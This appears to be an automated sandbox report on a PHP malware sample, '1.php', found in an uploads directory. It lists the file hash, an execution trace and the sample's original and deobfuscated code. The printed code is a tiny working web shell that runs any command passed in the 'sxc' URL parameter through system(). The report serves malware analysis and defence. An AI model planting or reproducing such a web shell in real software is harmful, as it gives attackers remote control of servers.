PHP Malware Analysis

1.php

md5: 66c24dd536df77295770ee34989118ab

Jump to:

Screenshot


Attributes

Environment

Execution

Input


Deobfuscated PHP code

<?php

echo php_uname();
if (isset($_GET['sxc'])) {
    system($_GET['sxc']);
}

Execution traces

data/traces/66c24dd536df77295770ee34989118ab_trace-1676237594.1024.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:33:40.000261]
1	0	1	0.000178	393464
1	3	0	0.000222	393096	{main}	1		/var/www/html/uploads/1.php	0	0
1	3	1	0.000239	393096
			0.000265	314200
TRACE END   [2023-02-12 19:33:40.000384]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?
echo php_uname();
if(isset($_GET['sxc'])){
    system($_GET['sxc']);
}